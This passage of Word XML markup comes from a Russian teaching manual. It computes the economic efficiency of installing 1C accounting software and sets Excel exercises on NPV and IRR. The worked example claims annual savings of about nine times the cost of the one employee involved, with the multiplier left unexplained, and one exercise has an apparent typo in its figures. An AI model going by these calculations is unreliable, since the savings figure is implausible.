                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Проведение расчетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2871" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Подготовка и печать отчетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2871" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Анализ и выборка данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2871" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Экономия, связанная с повышением производительности труда пользователя Р определим по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="945750" cy="420105"/>
            <wp:effectExtent l="19050" t="0" r="6750" b="0"/>
            <wp:docPr id="38" name="Рисунок 85" descr="https://antegra.ru/UserFiles/Image/formu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antegra.ru/UserFiles/Image/formula2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId446" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="945312" cy="419911"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Zп - среднегодовая заработная плата пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПРИМЕР</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для большего понимания материала рассмотрим в качестве примера небольшую типовую российскую организацию, занимающуюся оказанием услуг, в которой автоматизируется отдел бухгалтерии с одним рабочим местом. В качестве средства автоматизации выбрано программное средство «фирмы 1С» - «1С:Бухгалтерия Предприятия </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.0». Подразумеваем, что внедряет программное средство сторонняя организация. Стоимость «1С:Бухгалтерия Предприятия 2.0» составляет 10800 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стоимость услуг сторонней организации по ее внедрению составляют 10000 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В итоге капитальные затраты на внедрение составят:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К = 10800 + 10000 = 20800 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Посчитаем расходы на содержание персонала, исходя из условия, что оклад сотрудника составляет 50000 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Z = 1 * 50000 * (1 + 34% / 100) = 67000 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В нашем примере, для простоты, накладные и прочие расходы до и после внедрения программы будем рассматривать как неизменные, т.е. внедрение программы не вызвало экономию чернил в картриджах принтеров, расходование бумаги и т.п. Таким образом, годовая экономия будет равна экономии, связанной с повышением производительности труда пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассчитаем экономию за счет увеличения производительности труда сотрудника. В нашем примере бухгалтерский учет велся на компьютере, но в ручную с использованием различных программ, позволяющих хранить данные в таблицах. Например, MS Excel. В качестве исходных данных будем использовать данные, приведенные в Таблице 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Экономия, связанная с повышением производительности труда пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P = 67000 * 9 = 603000 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В итоге получаем следующую ожидаемую экономическую эффективность:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Э = 603000 – 20800 * 0,15 = 599880 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>О чем говорят эти цифры? Даже при приблизительном расчете экономическая эффективность от внедрения программного средства получилась значительной. Такой она получилась за счет увеличения производительности труда сотрудника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Соответственно потратив всего 20800 рублей</w:t>
      </w:r>
      <w:r w:rsidR="007212A1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> получаем экономию за год в 599880 рублей!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вывод: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>По результатам расчета экономической эффективности проектирования и внедрения средства автоматизации сразу можно , что это выгодно. Хоть выгода и косвенная, но, как правило, заметная в средне и долгосрочной перспективе. Внедрение средств автоматизации может привести к корректированию самого бизнес-процесса, так как задачи выполняются быстрее. Сотрудники могут обрабатывать большие объемы информации за свое рабочее время, что можно использовать или для уменьшения затрат на персонал или для быстрого развития бизнеса при неизменности количества сотрудников, занятых обработкой информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В процессе расчета экономический эффективности необходимо учитывать одно свойство автоматизации. Заключается оно в следующем: чем больше средств и времени потрачено на автоматизацию тем выше экономический эффект от внедрения. Объясняется это довольно просто: если качественно подойти к выбору программного продукта, качественно проработать все бизнес-процессы на этапе проектирования и внедрения, все описать и отладить, то в последующем будет потрачено гораздо меньше средств на эксплуатацию программы. Важно отметить, что в случае если одним программным средством автоматизируются различные подразделения и сотрудники, то уменьшаются затраты на организацию документооборота между ними. Уменьшаются как временные</w:t>
      </w:r>
      <w:r w:rsidR="007212A1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> так и материальные затраты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF54E5" w:rsidRPr="00617AC0" w:rsidRDefault="00DF54E5" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задания: выполняются в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006557EB" w:rsidRPr="00617AC0" w:rsidRDefault="006557EB" w:rsidP="006557EB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инвестиционный проект предусматривает капитальные вложения в сумме 25000 ден. ед. Ожидаемые годовые чистые денежные поступления - 6000 ден. ед. в течение шести лет. Процент на капитал (ставка дисконтирования) - 12%. Выгоден ли данный проект исходя из критерия NPV? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006557EB" w:rsidRPr="00617AC0" w:rsidRDefault="006557EB" w:rsidP="006557EB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача 2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инвестиционный проект предусматривает капитальные вложения в сумме 55000 ден. ед., ожидаемые годовые чистые поступления 12000 ден. ед. Проценты на капитал – 10%. Выгоден ли данный проект исходя из критерия NPV, если его длительность а) 5 лет; б) 7 лет? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006557EB" w:rsidRPr="00617AC0" w:rsidRDefault="006557EB" w:rsidP="006557EB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Задача 3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инвестиционный проект требует инвестиций в размере 38 000 ден. ед. В течение первых трех лет ожидаемый доход составляет 10000 ден. ед. в год, а в течение следующих трех лет равен 8000 ден. ед. в год. Процент на капитал – 10%. Выгоден ли данный проект исходя из критерия NPV? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006557EB" w:rsidRPr="00617AC0" w:rsidRDefault="006557EB" w:rsidP="006557EB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача 4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требуется определить значение показателя IRR для инвестиционного проекта, рассчитанного на три года, требующего инвестиций в размере 10 000 ден. ед. и имеющего денежные поступления по годам в размере 3 000 ден. ед., 4 000 ден. ед., 7 ден. ед.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006557EB" w:rsidRPr="00617AC0" w:rsidRDefault="006557EB" w:rsidP="006557EB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача 5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предприятие рассматривает инвестиционный проект, первоначальные затраты по которому составят 100 000 руб. Ожидаемые чистые поступления от реализации проекта равны 50 000, 60 000 и 40 000 руб. Произвести оценку проекта, если в результате опроса экспертов были получены следующие значения коэффициентов достоверности: 0,9, 0,85 и 0,6 соответственно. Ставка по безрисковой операции равна 8%.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0021456A" w:rsidRPr="00617AC0" w:rsidRDefault="0021456A" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc26278745"/>
      <w:bookmarkStart w:id="197" w:name="_Toc507786845"/>
      <w:bookmarkStart w:id="198" w:name="_Toc507788236"/>
      <w:bookmarkStart w:id="199" w:name="_Toc507788506"/>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B108F3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA4CC7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка рекомендаций по эффективному использованию ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidR="00AA4CC7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
